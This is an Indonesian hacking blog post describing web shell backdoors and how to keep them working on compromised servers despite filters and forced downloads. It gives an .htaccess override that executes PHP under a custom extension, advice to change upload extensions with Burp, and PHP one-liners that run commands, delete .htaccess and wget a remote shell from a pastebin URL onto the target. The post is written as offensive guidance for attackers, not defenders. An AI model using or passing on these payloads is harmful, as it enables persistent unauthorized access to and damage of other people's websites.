Shell Backdoor adalah file yang ditanamkan oleh attacker ke server pada aktivitas hacking. Biasanya shell backdoor dibuat dengan format php atau asp, namun tidak menutup kemungkinan shell backdoor memiliki extensi yang lain. Shell backdoor sendiri punya beberapa fungsi, yaitu:
- Mendapatkan akses lebih terhadap website
- Sebagai jalur belakang hacker untuk masuk kembali (tanpa exploitasi ulang)
- Meracuni website dengan code jahat agar terjadi kerusakan pada website
Dalam beberapa kasus saat kita ingin mengakses shell backdoor pada target, shell yang kita upload sering kali terdownload, nakanosec mempunyai beberapa teknik untuk bypass kasus ini yuk mulai
Mengatasi Shell Backdoor Yang Forbidden dan Terhapus
Ada beberapa penyebab shell backdoor forbidden atau terhapus, salah satunya adalah penggunaan filter dimana melakukan block pada script tertentu. Kasus ini dapat diatasi dengan menggunakan shell tmp atau marijuana. untuk source codenya seperti berikut
Tmp Shell Backdoor
Kalian bisa ubah url shell indoxploit dengan url shell kalian (dalam bentuk txt)
Marijuana Shell Backdoor
Baca juga: Bug PPPD Di Sistem Operasi Linux ,Hacker Mampu Melakukan Serangan Remote Code Execution (RCE)
Mengatasi Shell Backdoor Yang Terdownload
Selain Forbidden ada juga kasus shell yang terdownload saat diakses hal ini seringkali disebabkan oleh .htaccess namun ada juga yang memang tidak bisa dibypass seperti kasus dimana file terupload di aws ataupun didownload dengan script php. Berikut teknik teknik untuk bypass shell backdoor yang terdownload
Bypass Shell Backdoor Dengan Override .htaccess
- Buat file dengan nama .htaccess dengan isi sebagai berikut
AddType application/x-httpd-php .nakanosec
- Upload ke server target, jika tidak bisa terupload coba gunakan burp dan ganti ektensi
- Siapkan Shell Marijuana dan rename menjadi Marijuana.nakanosec
- Upload Shell Marijuana.nakanosec kemudian coba akses
Bypass Shell Backdoor Dengan One Line Shell
- Buat file nakanosec.php
- Isi nakanosec.php dengan payload dibawah
<?php
system("id")
?>
- Upload ke server target
- Shell akan terdownload tapi command akan tereksekusi
- Untuk upload shell remove dulu .htaccess dengan payload berikut
<?php
system("rm .htaccess")
?>
- kemudian untuk uploadnya gunakan payload berikut
<?php
system("wget https://pastebin.com/raw/tizUkMj9 -O nakanosec.php")
?>
Mungkin itu saja untuk hari ini. Keep learn stay silent - Nakanosec